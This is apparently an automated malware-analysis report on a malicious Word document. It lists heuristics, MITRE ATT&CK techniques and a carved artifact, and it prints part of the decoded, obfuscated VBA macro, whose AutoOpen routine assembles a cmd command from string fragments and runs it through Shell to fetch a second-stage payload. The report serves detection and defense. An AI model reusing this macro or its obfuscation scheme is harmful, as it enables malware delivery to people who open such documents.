MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and attempts to execute a command via the Shell function. This indicates the document is designed to download and execute a secondary payload, a common technique for malware delivery. The specific command executed is obfuscated, preventing confident identification of the payload's nature or destination.
Heuristics 5
-
ClamAV: Doc.Downloader.Generic-6666924-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6666924-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15965 bytes |
SHA-256: 5e5b61fcb9a82f77b3ba6c99693f27dbb7c64c4cf2525b3b05708dabbd86d955 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "rdnlsnDhI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Round(53367 * 98974 / sLEXZ / XohnZ)
TypeName CLng(NbMGk / aadcIa)
TypeName Log(37)
TypeName ChrB(jwwPR)
Shell! KeyString(vbKeyC) + GMkzwjjir + FSCznNCshNNtbj + QMoiwqhskH + oOPla + VXrzOiCAmM + oNvuMEWFIE + nHoOud + lhmGoWHvbN + cOERhw + PDtiNJ + OPVmLCOqiwO + HuoBSSuRv + DaJaisVLlp + douYRXDtTI, 104849224 - 104849224
TypeName Atn(qTwvz)
TypeName Sin(LUikmt)
End Sub
Attribute VB_Name = "UsiprQV"
Function QMoiwqhskH()
On Error Resume Next
TypeName wMnFw
TypeName nZYSi
TypeName Atn(99540 / SiNwbb / dRPNo + sTiOG)
ifrPzvpm = "md" + " " + "/V" + ":O" + " " + " " + " /" + CStr(Chr(uEjBCZjcLE + ZwtzbQtu + 67 + ztitOkSZ + qdqAURrz)) + " " + CStr(Chr(ZMwuIqm + WHmOlEnXJKwJma + 34 + wFsdJZwPIj + kkYzudHBDOFvhu)) + " se" + "t " + "7y"
TypeName NQnNPl
TypeName 198680785
ZbXbk = "=NI" + "vzw" + "W" + CStr(Chr(fqnmsYLluulw + FCRqmYmAPI + 67 + RizzvPq + SvBELYnDArKq)) + "o" + "WA" + "T" + "jZn" + "vDK" + "hw"
TypeName CByte(4938803)
TypeName CStr(5188 / aBMUIB - 58610 / uGtDYv)
TypeName rIAZz
ouzPwaknvVH = "j" + "i" + "Bu" + CStr(Chr(DdqHJAib + qGdlwwWGC + 108 + GQlbAwzORILkZ + FIhJFqRhO)) + "ER" + "2}" + "Fbp" + "@" + CStr(Chr(BGCVEouVzNFjIB + NLiWDods + 99 + shwoiWWFwq + DXqEzFAcYHXiDW)) + "5" + "m" + "0;." + "("
TypeName Sin(MiOGm / iDRFjX)
TypeName Atn(wZazH)
TypeName Chr(19981 - rWnfKP * 4767 / dWaRK)
zMBIKEwAij = "\U" + "=" + "H" + "d" + "aS" + "rg" + "'" + "s-" + "/k" + "," + "1:" + "e{"
TypeName 12
TypeName Hex(npnrtj)
TypeName Sgn(NEiTO + osGiE)
PKQzWdzb = "$Ot" + " " + CStr(Chr(qNcJHfvNYIii + EqzRHGf + 76 + YslAkJSlMmnOj + oYccjqb)) + "f" + "xM" + "J" + ")y+" + "P6&" + "&f" + "or " + " %R" + " i" + "n "
TypeName 176831452
TypeName Tan(qJclj)
soNItRV = " (" + " " + " 3" + "0" + " 7 " + " " + " 18" + " " + "56 " + " "
TypeName 77
TypeName ChrB(6)
dKZbaBwnQ = "46 " + "4" + "9 " + "17" + " " + " " + "5"
TypeName Round(65338 / 18832 + 36809 + 98103)
TypeName 100520443
CUcfVkN = "6" + " " + " " + " " + "23 " + "23 " + " "
TypeName Int(hRvCdo - cUKRai)
TypeName CBool(96357 - zLUiO / 28003 / YDszkK)
hlPWqoH = " 6" + "1 5" + "8 " + " 13" + " " + " 18" + " " + " 3"
TypeName Int(NLIfp + WUaBQj - YlwMl - PiUcDj)
TypeName 14
womAqXwc = " 41" + " " + "13 " + "56 " + "18 " + " " + " "
QMoiwqhskH = ifrPzvpm + ZbXbk + ouzPwaknvVH + zMBIKEwAij + PKQzWdzb + soNItRV + dKZbaBwnQ + CUcfVkN + hlPWqoH + womAqXwc
TypeName 1770
TypeName Cos(oHwwUi)
TypeName CByte(SsXYhD)
End Function
Function oOPla()
On Error Resume Next
TypeName 316398493
TypeName EmjbSo
vkwQVL = "50" + " " + "7 " + "29 " + "1" + "9 5" + "6 " + " 3" + "2 " + " " + " " + "6"
TypeName ChrW(FwpWZj)
TypeName 140
ELIjEB = "0 6" + "1 " + "0 5" + "6 " + " " + "60 " + " " + "37" + " " + " "
TypeName 875
TypeName CByte(KqBQoZ)
TypeName Int(OkBlY)
ibozol = " " + "8" + " " + " " + "56" + " "
TypeName QVWCBz
TypeName NoKXM
RApkz = " 2" + "9 " + " " + " 6 " + " " + "2" + "3 " + " "
TypeName 186
TypeName 343001298
iZfTaXC = " 2" + "0" + " " + " " + "56 " + " "
TypeName DYuOSk
TypeName 2
TypeName 3541
rIKOfEY = " " + "1" + "3 " + "60" + " " + "36 " + "5"
TypeName Cos(120148860)
TypeName CLng(CqYVCX)
TypeName Atn(60100 / ukITi)
wvNwvHLo = "8 " + "6" + "5" + " " + "14 " + " "
TypeName JQPIu
TypeName CByte(jCPNa)
BnnWjp = "0" + " 4" + "1" + " " + " 4" + "8 " + "17" + " "
TypeName 88
TypeName qQIQq
mlwUb = " " + " " + "6" + "0 " + "60 " + " " + "30 " + "55 " + "51" + " " + "51" + " " + "18 "
TypeName Int(dMYAAE)
TypeName 2
UlLmC = "18 " + " 18" + " " + " 3" + "7" + " " + " "
TypeName IhYzMG
TypeName Atn(18607 - 27265)
TypeName wsPsTk
MjX
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.